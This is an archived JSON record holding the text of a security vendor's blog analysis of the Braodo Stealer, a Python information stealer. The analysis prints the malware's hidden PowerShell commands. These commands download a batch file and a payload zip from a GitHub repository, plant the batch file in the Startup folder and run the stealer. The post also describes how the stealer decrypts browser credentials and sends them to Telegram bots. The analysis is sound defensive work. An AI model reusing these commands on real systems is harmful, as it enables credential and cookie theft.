{
	"id": "2e5d45b2-1c8a-4625-a615-6cd07d9ad3bc",
	"created_at": "2026-04-06T00:19:51.974943Z",
	"updated_at": "2026-04-10T03:21:55.148587Z",
	"deleted_at": null,
	"sha1_hash": "612e273379ff1bc2dace486600492a76ea7aa29a",
	"title": "Echoes of Braodo Tales from the Cyber Underworld",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 349877,
	"plain_text": "Echoes of Braodo Tales from the Cyber Underworld\r\nPublished: 2024-07-22 · Archived: 2026-04-05 20:44:14 UTC\r\nIn the last few months we’ve been observing a lot of tweets talking about the rise in Vietnamese-based malware\r\naka Braodo Stealer. This blog gets into the nuances of Braodo, an information stealer, capable of stealthily\r\ninfiltrating the victims’ system to harvest their sensitive information, such as credentials, banking information and\r\nmore, and do their intended damage like, identity theft and financial losses. In this blog, we have analyzed one of\r\nthe Stealers’ hashes taken from this recent tweet.\r\nThis stealer was first seen in the real world as shown in Fig.1.\r\nFig.1: First seen in real world  (Source:  MalwareBazaar)\r\nBraodo Stealer is a Python based Stealer, which collects all cookies and saved credentials from the browsers and\r\nall services and process information of that particular system as a zip file. Let us now get into the technicalities.\r\nThe execution flow is as shown in Fig.2. \r\nFig.2: Flow of its execution\r\nInitially it comes as a zip file. On extracting, it contains a bat file “health-records-x-ray-n.bat” which starts with\r\nunicode “FF FE” which uses BOM , to show the batch file data as unreadable characters as shown in below\r\nfigure.3, if we open it in notepad++. \r\nAfter removing “FF FE” and opening it in notepad++, it looks  as in Figure.4.\r\nhttps://labs.k7computing.com/index.php/echoes-of-braodo-tales-from-the-cyber-underworld/\r\nPage 1 of 8\n\nFig.3: Batch file in notepad++ with “FF FE”\r\nFig.4: Batch file after removing “FF FE”\r\nOn executing the bat file, it starts the PowerShell process and downloads a bat file from GitHub URL with the\r\nfollowing command and saves that file as “Windows Secure.bat” in the Startup folder for persistence from below\r\ncommand.\r\nC:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden Invoke-WebRequest -\r\nURI https://github.com/ohlisit/123/raw/main/update.bat -OutFile\r\n“C:\\\\Users\\\\$([Environment]::UserName)\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\’Start\r\nMenu’\\\\Programs\\\\Startup\\\\WindowsSecure.bat”;\r\nFig.5: Connection of PowerShell to GitHub\r\nhttps://labs.k7computing.com/index.php/echoes-of-braodo-tales-from-the-cyber-underworld/\r\nPage 2 of 8\n\nFig.6: Writing WindowsSecure.bat in the Startup folder\r\nIt also downloads a zip file called “Document.zip” in the path “C:\\Users\\Public” from the GitHub URL as shown\r\nin the below command.\r\npowershell.exe -WindowStyle Hidden -Command “[Net.ServicePointManager]::SecurityProtocol =\r\n[Net.SecurityProtocolType]::Tls12; (New-Object -TypeName\r\nSystem.Net.WebClient).DownloadFile(‘https://github.com/ohlisit/123/raw/main/Document.zip’,\r\n‘C:\\Users\\Public\\Document.zip’)”;\r\nFig.7: Downloaded contents of Document.zip in “C:\\Users\\Public”\r\nIf we manually get into that GitHub repository, we can see their bat files and zip files are getting periodically\r\nupdated, as can be seen in the figure below.\r\nFig.8: GitHub Repository\r\nThe Document.zip is uncompressed using the following command:\r\nhttps://labs.k7computing.com/index.php/echoes-of-braodo-tales-from-the-cyber-underworld/\r\nPage 3 of 8\n\ncmd /c powershell.exe -WindowStyle Hidden -Command Expand-Archive -Path\r\n“C:\\Users\\Public\\Document.zip” -DestinationPath “C:/Users/Public/Document”;\r\nThe Document.zip file contains all libraries related to python.exe which is shown in Fig.8, we found a python file\r\nwith name “sim.py” which is the actual payload written in python language as shown in Figure.9, it contains junk\r\ndata along with actual payload code the below Figure.10.\r\nFig.9: Payload as sim.py\r\nFig.10: Sim.py having stealer code\r\nAfter unzipping the file in the location “C:\\Users\\Public\\Document”, it starts the python.exe with the below\r\ncommand, to proceed further which will be discussed in detail now.\r\npowershell.exe -WindowStyle Hidden -Command “C:\\Users\\Public\\Document\\python\r\nC:\\Users\\Public\\Document\\Lib\\sim.py”\r\nFig.11: Creating python.exe process by PowerShell\r\nAfter creating Python.exe, it loads all the required libs and DLLs from the Document folder and starts executing\r\ncode that is present in sim.py step by step.\r\nhttps://labs.k7computing.com/index.php/echoes-of-braodo-tales-from-the-cyber-underworld/\r\nPage 4 of 8\n\nIt starts execution of code by retrieving computer name, current login user name, windows version, time of\r\ncomputer, IP of system by requesting to “https://ipinfo.io”.\r\nFig.12: Retrieving computer IP, current user name\r\nIn the main function, we can find the Telegram API bots URL strings in u1 and u2 variables which would be used\r\nto send the stolen information to it.\r\nFig.13: Telegram API bots\r\nThen it takes the path of all browsers’ user data present in the system, and checks each browser’s path if it exists\r\nor not. If it exists, it starts stealing all user data, cookies, web data, login data, local state from all the browsers\r\npresent in the system and places all of them in separate folders having the browser name.\r\nhttps://labs.k7computing.com/index.php/echoes-of-braodo-tales-from-the-cyber-underworld/\r\nPage 5 of 8\n\nFig.14: Checking paths and creating folders for every Browser\r\nThen it decrypts all the sensitive data like login data, cookies, web data from every browser by connecting to\r\n“Login data” SQLite database and “Cookies” SQLite database using the AES algorithm with master key generated\r\nfrom Local State file.\r\nFig.15: Decrypting login data and cookies from its database using AES\r\nAfter collecting and writing all data from different locations to text files, it converts the files into a zip file, for\r\nsending them into the Telegram channel.\r\nhttps://labs.k7computing.com/index.php/echoes-of-braodo-tales-from-the-cyber-underworld/\r\nPage 6 of 8\n\nFig.16: Collected data\r\nFig.17: Snippet of converting into zip file\r\n After keeping all files together with zip extension, it sends that zip file to the Telegram channel  as shown in\r\nFigure.18 and Figure.19. It then removes “Document.zip” from its location.\r\nFig.18: POST request for sending zip file\r\nhttps://labs.k7computing.com/index.php/echoes-of-braodo-tales-from-the-cyber-underworld/\r\nPage 7 of 8\n\nFig.19: Removing “Document.zip”\r\nAs we can see, threat actors are updating their malware to become more and more evasive. Compared to other\r\nstealers, this one is mainly focused on network related information which could be used for active reconnaissance.\r\nAs the information stolen by the malware is sensitive, protecting yourself by investing in a reputable security\r\nproduct such as K7 Antivirus is therefore necessary in today’s world. We at K7 Labs provide detection for such\r\nkinds of stealers and all the latest threats. Users are advised to use a reliable security product such as “K7 Total\r\nSecurity” and keep it up-to-date to safeguard their devices.\r\nIOC\r\nFile Name Hash Detection Name\r\nhealth-records-x-ray-n\r\n4BA8BDD684441EF9F6F9AC7DE7EDB28B\r\nTrojan ( 0001140e1\r\n)\r\nSource: https://labs.k7computing.com/index.php/echoes-of-braodo-tales-from-the-cyber-underworld/\r\nhttps://labs.k7computing.com/index.php/echoes-of-braodo-tales-from-the-cyber-underworld/\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://labs.k7computing.com/index.php/echoes-of-braodo-tales-from-the-cyber-underworld/"
	],
	"report_names": [
		"echoes-of-braodo-tales-from-the-cyber-underworld"
	],
	"threat_actors": [],
	"ts_created_at": 1775434791,
	"ts_updated_at": 1775791315,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/612e273379ff1bc2dace486600492a76ea7aa29a.pdf",
		"text": "https://archive.orkl.eu/612e273379ff1bc2dace486600492a76ea7aa29a.txt",
		"img": "https://archive.orkl.eu/612e273379ff1bc2dace486600492a76ea7aa29a.jpg"
	}
}